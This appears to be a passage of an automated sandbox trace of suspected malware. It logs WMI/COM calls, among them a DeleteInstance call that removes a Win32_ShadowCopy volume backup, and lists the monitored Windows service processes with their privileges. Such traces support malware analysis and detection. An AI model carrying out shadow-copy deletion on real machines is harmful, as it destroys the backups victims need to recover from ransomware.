WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b796ea0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0135.656] WbemDefPath:IUnknown:Release (This=0x1b796ea0) returned 0x3 [0135.656] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0135.656] WbemDefPath:IUnknown:AddRef (This=0x1c903850) returned 0x4 [0135.657] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903850, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0135.657] WbemDefPath:IUnknown:Release (This=0x1c903850) returned 0x3 [0135.657] WbemDefPath:IUnknown:Release (This=0x1c903850) returned 0x2 [0135.657] WbemDefPath:IUnknown:Release (This=0x1c8f1a20) returned 0x0 [0135.657] WbemDefPath:IUnknown:Release (This=0x1c903850) returned 0x1 [0135.657] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0135.657] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0135.657] WbemDefPath:IUnknown:AddRef (This=0x1c903850) returned 0x2 [0135.657] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903850, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c903850) returned 0x0 [0135.657] WbemDefPath:IUnknown:Release (This=0x1c903850) returned 0x2 [0135.657] WbemDefPath:IUnknown:Release (This=0x1c903850) returned 0x1 [0135.658] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0135.658] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0135.658] WbemDefPath:IUnknown:AddRef (This=0x1c903850) returned 0x2 [0135.658] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903850, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c903850) returned 0x0 [0135.658] WbemDefPath:IUnknown:Release (This=0x1c903850) returned 0x2 [0135.658] WbemDefPath:IUnknown:AddRef (This=0x1c903850) returned 0x3 [0135.658] WbemDefPath:IWbemPath:SetText (This=0x1c903850, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"") returned 0x0 [0135.658] WbemDefPath:IUnknown:Release (This=0x1c903850) returned 0x2 [0135.658] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0135.658] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0135.658] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0135.658] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0135.658] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0135.658] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0135.659] IWbemClassObject:Get (in: This=0x1c910c90, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0135.659] SysStringLen (param_1="root\\cimv2") returned 0xa [0135.659] IWbemClassObject:Get (in: This=0x1c910c90, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0135.659] SysStringLen (param_1="root\\cimv2") returned 0xa [0135.659] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0135.659] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0135.659] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0135.659] IWbemClassObject:Get (in: This=0x1c910c90, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0135.659] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0135.659] IWbemClassObject:Get (in: This=0x1c910c90, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0135.659] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0135.662] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c903850, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0135.662] WbemDefPath:IWbemPath:GetText (in: This=0x1c903850, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 0x0 [0135.662] WbemDefPath:IWbemPath:GetText (in: This=0x1c903850, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"") returned 0x0 [0135.662] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0135.662] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0135.662] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0135.662] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0135.662] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0135.662] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0135.662] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0135.662] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0135.662] IWbemClassObject:Get (in: This=0x1c910c90, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0135.663] WbemDefPath:IWbemPath:GetText (in: This=0x1c903850, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0135.663] WbemDefPath:IWbemPath:GetText (in: This=0x1c903850, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"") returned 0x0 [0135.663] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0135.736] CoTaskMemAlloc (cb=0x8) returned 0x27f6b0 [0135.736] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x27f6b0, puReturned=0x1c64d8b8 | out: apObjects=0x27f6b0*=0x0, puReturned=0x1c64d8b8*=0x0) returned 0x1 [0135.737] CoTaskMemFree (pv=0x27f6b0) [0135.740] CoGetContextToken (in: pToken=0x1c64d640 | out: pToken=0x1c64d640) returned 0x0 [0135.740] WbemLocator:IUnknown:Release (This=0x1b798970) returned 0x1 [0135.740] IUnknown:Release (This=0x1c8f4788) returned 0x0 [0135.748] SetEvent (hEvent=0x390) returned 1 [0135.748] SetEvent (hEvent=0x384) returned 1 [0135.748] SetEvent (hEvent=0x388) returned 1 [0135.748] SetEvent (hEvent=0x38c) returned 1 [0135.748] SetEvent (hEvent=0x37c) returned 1 [0135.748] SetEvent (hEvent=0x394) returned 1 [0135.748] SetEvent (hEvent=0x398) returned 1 [0135.748] SetEvent (hEvent=0x3b8) returned 1 [0135.748] SetEvent (hEvent=0x3a0) returned 1 [0135.749] CoUninitialize () Thread: id = 83 os_tid = 0x9e0 Thread: id = 84 os_tid = 0xc4 Thread: id = 85 os_tid = 0xbf0 Thread: id = 123 os_tid = 0x72c [0135.766] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0135.769] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409 [0135.770] VirtualQuery (in: lpAddress=0x1c62da20, lpBuffer=0x1c62e8e0, dwLength=0x30 | out: lpBuffer=0x1c62e8e0*(BaseAddress=0x1c62d000, AllocationBase=0x1bca0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x1000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.771] VirtualQuery (in: lpAddress=0x1c62dcd0, lpBuffer=0x1c62eb90, dwLength=0x30 | out: lpBuffer=0x1c62eb90*(BaseAddress=0x1c62d000, AllocationBase=0x1bca0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.781] SetEvent (hEvent=0x48c) returned 1 [0135.781] SetEvent (hEvent=0x3a4) returned 1 [0135.781] SetEvent (hEvent=0x1cc) returned 1 [0135.781] SetEvent (hEvent=0x48c) returned 1 [0135.781] SetEvent (hEvent=0x3a4) returned 1 [0135.781] SetEvent (hEvent=0x3f8) returned 1 [0135.781] SetEvent (hEvent=0x3e4) returned 1 [0135.781] SetEvent (hEvent=0x3e8) returned 1 [0135.781] SetEvent (hEvent=0x454) returned 1 [0135.782] SetEvent (hEvent=0x3f4) returned 1 [0135.782] CoUninitialize () Process: id = "5" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x6026b000" os_pid = "0xa1c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:000435e2" [0xc000000f] Thread: id = 86 os_tid = 0xbc4 Thread: id = 87 os_tid = 0xa44 Thread: id = 88 os_tid = 0xa3c Thread: id = 89 os_tid = 0xa38 Thread: id = 90 os_tid = 0xa34 Thread: id = 91 os_tid = 0xa30 Thread: id = 92 os_tid = 0xa2c Thread: id = 93 os_tid = 0xa24 Thread: id = 94 os_tid = 0xa20 Thread: id = 122 os_tid = 0xa58 Thread: id = 2595 os_tid = 0xd9c Process: id = "6" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x61d66000" os_pid = "0x9e8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e990" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 95 os_tid = 0xbbc Thread: id = 96 os_tid = 0xa08 Thread: id = 97 os_tid = 0xa04 Thread: id = 98 os_tid = 0xa00 Thread: id = 99 os_tid = 0x9fc Thread: id = 100 os_tid = 0x9f8 Thread: id = 101 os_tid = 0x9f0 Thread: id = 102 os_tid = 0x9ec Thread: id = 132 os_tid = 0x358 Thread: id = 2594 os_tid = 0xd98 Process: id = "7" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x42d47000" os_pid = "0x810" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:00061ea8" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 106 os_tid = 0x5cc Thread: id = 107 os_tid = 0x7a8 [0108.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf2ddc0 | out: lpSystemTimeAsFileTime=0xf2ddc0*(dwLowDateTime=0xbf701800, dwHighDateTime=0x1d6f256)) [0108.643] GetCurrentProcessId () returned 0x810 [0108.643] GetCurrentThreadId () returned 0x7a8 [0108.643] GetTickCount () returned 0x114f7c7 [0108.643] QueryPerformanceCounter (in: lpPerformanceCount=0xf2ddc8 | out: lpPerformanceCount=0xf2ddc8*=22883971139) returned 1 [0108.643] malloc (_Size=0x100) returned 0x3d8e80 [0137.345] free (_Block=0x3d8e80) Thread: id = 108 os_tid = 0x840 Thread: id = 109 os_tid = 0x67c Thread: id = 110 os_tid = 0x6f0 Thread: id = 111 os_tid = 0x3a4 Thread: id = 112 os_tid = 0x920 Thread: id = 114 os_tid = 0x9d0 Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4264c000" os_pid = "0x618" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:000622a4" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 115 os_tid = 0x31c Thread: id = 116 os_tid = 0xa7c Thread: id = 117 os_tid = 0x970 Thread: id = 118 os_tid = 0x9e4 Thread: id = 119 os_tid = 0xa0c Thread: id = 120 os_tid = 0x960 Thread: id = 2596 os_tid = 0xdac Process: id = "9" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x24f0e000" os_pid = "0x2c8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7a5" [0xc000000f], "LOCAL" [0x7] Thread: id = 2137 os_tid = 0x850 Thread: id = 2138 os_tid = 0x9c8 Thread: id = 2139 os_tid = 0x8b0 Thread: id = 2140 os_tid = 0xba8 Thread: id = 2141 os_tid = 0x7b8 Thread: id = 2142 os_tid = 0x3d4 Thread: id = 2143 os_tid = 0x36c Thread: id = 2144 os_tid = 0x308 Thread: id = 2145 os_tid = 0x5f8 Thread: id = 2146 os_tid = 0x5f0 Thread: id = 2147 os_tid = 0x5ec Thread: id = 2148 os_tid = 0x5d0 Thread: id = 2149 os_tid = 0x12c Thread: id = 2150 os_tid = 0x170 Thread: id = 2151 os_tid = 0x3c0 Thread: id = 2152 os_tid = 0x3b8 Thread: id = 2153 os_tid = 0x3a8 Thread: id = 2154 os_tid = 0x2fc Thread: id = 2155 os_tid = 0x2f8 Thread: id = 2156 os_tid = 0x2d4 Thread: id = 2157 os_tid = 0x2cc Thread: id = 2416 os_tid = 0xc90 Thread: id = 2590 os_tid = 0xd80 Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9236000" os_pid = "0x11c" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e33a" [0xc000000f], "LOCAL" [0x7] Thread: id = 2547 os_tid = 0xbf4 Thread: id = 2548 os_tid = 0xb98 Thread: id = 2549 os_tid = 0x540 Thread: id = 2550 os_tid = 0x548 Thread: id = 2551 os_tid = 0x750 Thread: id = 2552 os_tid = 0x6a0 Thread: id = 2553 os_tid = 0x680 Thread: id = 2554 os_tid = 0x66c Thread: id = 2555 os_tid = 0x5fc Thread: id = 2556 os_tid = 0x188 Thread: id = 2557 os_tid = 0x140 Thread: id = 2558 os_tid = 0x128 Thread: id = 2559 os_tid = 0x2b0 Thread: id = 2560 os_tid = 0x218 Thread: id = 2561 os_tid = 0x1cc Thread: id = 2593 os_tid = 0xd8c Thread: id = 2597 os_tid = 0xdb8 Thread: id = 2598 os_tid = 0xdbc Thread: id = 2599 os_tid = 0xddc Thread: id = 2600 os_tid = 0xde8 Thread: id = 2601 os_tid = 0xdec Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xad16000" os_pid = "0x338" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bc99" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 2564 os_tid = 0xc70 Thread: id = 2565 os_tid = 0x638 Thread: id = 2566 os_tid = 0x554 Thread: id = 2567 os_tid = 0x720 Thread: id = 2568 os_tid = 0x668 Thread: id = 2569 os_tid = 0x65c Thread: id = 2570 os_tid = 0x144 Thread: id = 2571 os_tid = 0x110 Thread: id = 2572 os_tid = 0x3f0 Thread: id = 2573 os_tid = 0x3ec Thread: id = 2574 os_tid = 0x3e4 Thread: id = 2575 os_tid = 0x3e0 Thread: id = 2576 os_tid = 0x3d0 Thread: id = 2577 os_tid = 0x3cc Thread: id = 2578 os_tid = 0x398 Thread: id = 2579 os_tid = 0x394 Thread: id = 2580 os_tid = 0x384 Thread: id = 2581 os_tid = 0x380 Thread: id = 2582 os_tid = 0x368 Thread: id = 2583 os_tid = 0x350 Thread: id = 2584 os_tid = 0x33c Thread: id = 2591 os_tid = 0xd84